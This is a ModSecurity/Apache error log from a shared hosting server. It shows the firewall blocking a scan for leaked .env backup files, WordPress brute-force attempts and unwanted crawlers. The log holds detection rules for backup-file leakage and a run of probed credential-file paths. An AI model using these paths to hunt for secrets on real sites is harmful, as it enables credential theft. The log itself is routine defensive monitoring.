[Tue May 26 16:33:18.164659 2026] [security2:error] [pid 808625:tid 808760] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV99TEl_SBaWibfDmpXaAAAAAU"]
[Tue May 26 16:33:18.308028 2026] [security2:error] [pid 808625:tid 808793] [client 207.241.173.115:37700] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env.bak"] [unique_id "ahV99jEl_SBaWibfDmpXiQAAACY"]
[Tue May 26 16:33:18.309036 2026] [security2:error] [pid 808625:tid 808787] [client 207.241.173.115:37714] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env.old"] [unique_id "ahV99jEl_SBaWibfDmpXigAAACA"]
[Tue May 26 16:33:18.311023 2026] [security2:error] [pid 808625:tid 808842] [client 207.241.173.115:37742] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env.orig"] [unique_id "ahV99jEl_SBaWibfDmpXjQAAAFc"]
[Tue May 26 16:33:19.428451 2026] [autoindex:error] [pid 808625:tid 808839] [client 205.210.31.181:0] AH01276: Cannot serve directory /home2/debatqhn/enattafoundation.org/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:33:19.724390 2026] [security2:error] [pid 808625:tid 808799] [client 14.187.248.246:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahV99zEl_SBaWibfDmpXqAAAACw"], referer: https://www.bloggertarget.com/
[Tue May 26 16:33:20.740976 2026] [security2:error] [pid 808625:tid 808785] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV99zEl_SBaWibfDmpXqwAAAB4"]
[Tue May 26 16:33:21.992479 2026] [security2:error] [pid 808625:tid 808817] [client 207.241.173.115:37758] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env~"] [unique_id "ahV9-TEl_SBaWibfDmpX4QAAAD4"]
[Tue May 26 16:33:22.308999 2026] [security2:error] [pid 808625:tid 808846] [client 207.241.173.115:37866] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env.local~"] [unique_id "ahV9-jEl_SBaWibfDmpX5QAAAFs"]
[Tue May 26 16:33:22.309035 2026] [security2:error] [pid 808625:tid 808833] [client 207.241.173.115:37876] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env.production.bak"] [unique_id "ahV9-jEl_SBaWibfDmpX5gAAAE4"]
[Tue May 26 16:33:22.309334 2026] [security2:error] [pid 808625:tid 808839] [client 207.241.173.115:37868] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env.local.copy"] [unique_id "ahV9-jEl_SBaWibfDmpX6AAAAFQ"]
[Tue May 26 16:33:22.309540 2026] [security2:error] [pid 808625:tid 808866] [client 207.241.173.115:37878] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env.production.old"] [unique_id "ahV9-jEl_SBaWibfDmpX5wAAAG8"]
[Tue May 26 16:33:22.387276 2026] [security2:error] [pid 808625:tid 808768] [client 207.241.173.115:37894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env.production.backup"] [unique_id "ahV9-jEl_SBaWibfDmpX7QAAAA0"]
[Tue May 26 16:33:22.387451 2026] [security2:error] [pid 808625:tid 808801] [client 207.241.173.115:37908] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env.production~"] [unique_id "ahV9-jEl_SBaWibfDmpX7AAAAC4"]
[Tue May 26 16:33:22.391421 2026] [security2:error] [pid 808625:tid 808820] [client 207.241.173.115:37834] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env.local.bak"] [unique_id "ahV9-jEl_SBaWibfDmpX7gAAAEE"]
[Tue May 26 16:33:22.493723 2026] [security2:error] [pid 808625:tid 808810] [client 207.241.173.115:37758] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env.swp"] [unique_id "ahV9-jEl_SBaWibfDmpX8gAAADc"]
[Tue May 26 16:33:22.593910 2026] [security2:error] [pid 808625:tid 808828] [client 207.241.173.115:37730] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env.copy"] [unique_id "ahV9-jEl_SBaWibfDmpX8wAAAEk"]
[Tue May 26 16:33:22.691160 2026] [security2:error] [pid 808625:tid 808857] [client 207.241.173.115:37878] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env.local.backup"] [unique_id "ahV9-jEl_SBaWibfDmpX-AAAAGY"]
[Tue May 26 16:33:22.691806 2026] [security2:error] [pid 808625:tid 808789] [client 207.241.173.115:37876] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env.production.swp"] [unique_id "ahV9-jEl_SBaWibfDmpX9gAAACI"]
[Tue May 26 16:33:22.691917 2026] [security2:error] [pid 808625:tid 808864] [client 207.241.173.115:37866] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env.production.orig"] [unique_id "ahV9-jEl_SBaWibfDmpX-QAAAG0"]
[Tue May 26 16:33:22.694371 2026] [security2:error] [pid 808625:tid 808813] [client 207.241.173.115:37908] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env.local.old"] [unique_id "ahV9-jEl_SBaWibfDmpX9AAAADo"]
[Tue May 26 16:33:22.700621 2026] [security2:error] [pid 808625:tid 808797] [client 207.241.173.115:37850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env.production.copy"] [unique_id "ahV9-jEl_SBaWibfDmpX-gAAACo"]
[Tue May 26 16:33:22.861666 2026] [security2:error] [pid 808625:tid 808818] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9-TEl_SBaWibfDmpXxgAAAD8"]
[Tue May 26 16:33:24.071171 2026] [security2:error] [pid 808625:tid 808803] [client 117.198.37.168:55479] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV9_DEl_SBaWibfDmpYDAAAADA"]
[Tue May 26 16:33:24.071313 2026] [security2:error] [pid 808625:tid 808803] [client 117.198.37.168:55479] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV9_DEl_SBaWibfDmpYDAAAADA"]
[Tue May 26 16:33:25.085456 2026] [security2:error] [pid 808625:tid 808758] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9-zEl_SBaWibfDmpYCAAAAAM"]
[Tue May 26 16:33:25.389738 2026] [security2:error] [pid 808625:tid 808746] [remote 74.7.241.58:39662] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV9_TEl_SBaWibfDmpYKAAANng"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:33:26.995647 2026] [security2:error] [pid 808625:tid 808868] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9_TEl_SBaWibfDmpYKQAAAHE"]
[Tue May 26 16:33:27.073772 2026] [security2:error] [pid 808625:tid 808758] [client 66.249.64.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahV9_zEl_SBaWibfDmpYSgAAAAM"]
[Tue May 26 16:33:27.074091 2026] [security2:error] [pid 808625:tid 808823] [client 66.249.64.110:42798] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahV9_jEl_SBaWibfDmpYSAAAAEQ"]
[Tue May 26 16:33:28.880381 2026] [security2:error] [pid 808625:tid 808765] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9_zEl_SBaWibfDmpYWQAAAAo"]
[Tue May 26 16:33:29.275306 2026] [security2:error] [pid 808625:tid 808798] [client 57.128.172.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-ADEl_SBaWibfDmpYZQAAACs"]
[Tue May 26 16:33:30.088981 2026] [security2:error] [pid 808625:tid 808636] [remote 176.61.149.56:45014] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.149.61.176.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahV-ATEl_SBaWibfDmpYgwAAKgo"]
[Tue May 26 16:33:31.134044 2026] [security2:error] [pid 808625:tid 808864] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-ATEl_SBaWibfDmpYggAAAG0"]
[Tue May 26 16:33:33.492331 2026] [security2:error] [pid 808625:tid 808855] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-AzEl_SBaWibfDmpYpwAAAGQ"]
[Tue May 26 16:33:35.377866 2026] [security2:error] [pid 808625:tid 808778] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-BTEl_SBaWibfDmpYyAAAABc"]
[Tue May 26 16:33:36.173654 2026] [security2:error] [pid 808625:tid 808852] [client 117.198.37.168:55786] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-CDEl_SBaWibfDmpY7AAAAGE"]
[Tue May 26 16:33:36.173761 2026] [security2:error] [pid 808625:tid 808852] [client 117.198.37.168:55786] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-CDEl_SBaWibfDmpY7AAAAGE"]
[Tue May 26 16:33:37.075079 2026] [security2:error] [pid 808625:tid 808805] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-BzEl_SBaWibfDmpY5QAAADI"]
[Tue May 26 16:33:37.568417 2026] [security2:error] [pid 808625:tid 808759] [client 185.191.171.10:14908] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/11/"] [unique_id "ahV-CTEl_SBaWibfDmpY_wAAAAQ"]
[Tue May 26 16:33:37.568582 2026] [security2:error] [pid 808625:tid 808759] [client 185.191.171.10:14908] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/11/"] [unique_id "ahV-CTEl_SBaWibfDmpY_wAAAAQ"]
[Tue May 26 16:33:37.830740 2026] [security2:error] [pid 808625:tid 808817] [client 114.119.146.111:42595] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "whitesun.in"] [uri "/1hfq/yamato-2202-episode-21.html"] [unique_id "ahV-CTEl_SBaWibfDmpZBgAAAD4"], referer: https://whitesun.in/1hfq/yamato-2202-episode-21.html
[Tue May 26 16:33:38.934779 2026] [security2:error] [pid 808625:tid 808862] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-CTEl_SBaWibfDmpZBQAAAGs"]
[Tue May 26 16:33:40.430757 2026] [security2:error] [pid 808625:tid 808824] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-CzEl_SBaWibfDmpZJwAAAEU"]
[Tue May 26 16:33:42.979042 2026] [security2:error] [pid 808625:tid 808757] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-DjEl_SBaWibfDmpZXQAAAAI"]
[Tue May 26 16:33:43.322348 2026] [autoindex:error] [pid 808625:tid 808836] [client 31.220.88.107:0] AH01276: Cannot serve directory /home2/axumv2df/public_html/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 16:33:44.083193 2026] [security2:error] [pid 808625:tid 808796] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-DzEl_SBaWibfDmpZdQAAACk"]
[Tue May 26 16:33:46.429762 2026] [security2:error] [pid 808625:tid 808833] [client 85.208.96.197:60974] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahV-EjEl_SBaWibfDmpZtAAAAE4"]
[Tue May 26 16:33:46.429902 2026] [security2:error] [pid 808625:tid 808833] [client 85.208.96.197:60974] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahV-EjEl_SBaWibfDmpZtAAAAE4"]
[Tue May 26 16:33:46.596763 2026] [security2:error] [pid 808625:tid 808758] [client 117.198.37.168:56100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-EjEl_SBaWibfDmpZuQAAAAM"]
[Tue May 26 16:33:46.596925 2026] [security2:error] [pid 808625:tid 808758] [client 117.198.37.168:56100] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-EjEl_SBaWibfDmpZuQAAAAM"]
[Tue May 26 16:33:46.705205 2026] [security2:error] [pid 808625:tid 808803] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-ETEl_SBaWibfDmpZpAAAADA"]
[Tue May 26 16:33:48.601693 2026] [security2:error] [pid 808625:tid 808855] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-EzEl_SBaWibfDmpZzgAAAGQ"]
[Tue May 26 16:33:51.331609 2026] [security2:error] [pid 808625:tid 808872] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-FTEl_SBaWibfDmpZ-wAAAHU"]
[Tue May 26 16:33:53.260459 2026] [security2:error] [pid 808625:tid 808757] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-GDEl_SBaWibfDmpaGwAAAAI"]
[Tue May 26 16:33:53.693292 2026] [security2:error] [pid 808625:tid 808838] [client 31.57.184.20:53204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "osmsi.org.in"] [uri "/wp-login.php"] [unique_id "ahV-GTEl_SBaWibfDmpaNwAAAFM"]
[Tue May 26 16:33:54.138574 2026] [security2:error] [pid 808625:tid 808847] [client 31.57.184.20:53695] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "osmsi.org.in"] [uri "/wp-login.php"] [unique_id "ahV-GjEl_SBaWibfDmpaQQAAAFw"]
[Tue May 26 16:33:54.799232 2026] [security2:error] [pid 808625:tid 808764] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-GjEl_SBaWibfDmpaQAAAAAk"]
